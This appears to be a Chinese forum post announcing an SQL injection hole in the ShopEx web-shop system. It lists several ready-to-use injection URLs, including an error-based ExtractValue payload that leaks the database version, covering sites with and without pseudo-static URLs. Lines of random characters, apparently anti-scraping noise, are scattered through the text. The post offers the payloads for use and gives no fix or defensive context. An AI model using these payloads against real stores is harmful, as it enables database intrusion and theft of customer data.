注入漏洞是一种经典的漏洞类型了,自从上次跟基友深聊了注入,我对注入的认识又提升了一个高度,在我看来不可以注入的地方,TMD的竟然可以注入,注入攻击最早出现了1998年,貌似是,记不清了。10多年了,依然存在,虽然比以前出现量少了,但不得不用到的一种攻击技术…
' F) ?0 `. ^; I0 J3 u w p8 A
% E% ?- | j2 z- |* c好吧,我扯远了~~
) k! V1 J) T% m2 L8 ^* O4 s其实注入不仅仅出现在动态页面上,难道伪静态后就不能注入了吗?NO~
" ]' @& [4 T/ a. A8 v/ t不扯了,直接说主题吧,shopex网店系统注入漏洞。注入点如下: + H' A; `2 v' K# G/ V* O
; x c5 D. ^7 _3 j, b
http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html 4 ~ \% [4 ^9 b
. ?9 n& L7 s: n( G+ }, `
http://www.x.com/comment-8967′/**/and/**/ExtractValue(0×64,concat(0×01,(select/**/@@version)))/**/order/**/by/**/’1-ask-commentlist.html
7 l: {4 ~% g" J" F4 R
9 e0 g0 I9 x8 A% r2 F% T/ ]http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html 7 Z% O1 Y6 ^8 _* a0 s! L6 o
' I# V1 e1 a- J+ ^; ` b( chttp://demo.x.com.cn/485/index.php?comment-190′/**/and/**/’1′=’1-ask-commentlist.html # f' i. F( N. _) ]" I
$ s0 x3 ^( c* e3 n
: Q0 ^/ _# _! l1 O" n+ {' u一个是网站未开启伪静态的注入,一个是网站开启伪静态后的注入,以及是否屏蔽错误回显的2X2=4种情况。
" G9 m9 W: b! M5 l. J$ Y6 l# |如何注入就不多说了,10多年的东西了…不会也会了…
% h( b5 {9 u* O! J' s% w1 ^- y4 q! |1 \ w4 g) R& X
/ h% y1 r6 u- X1 I, X
5 N: L) P; e1 E
+ w% X% W+ Y* {, a# ?2 L/ l3 u |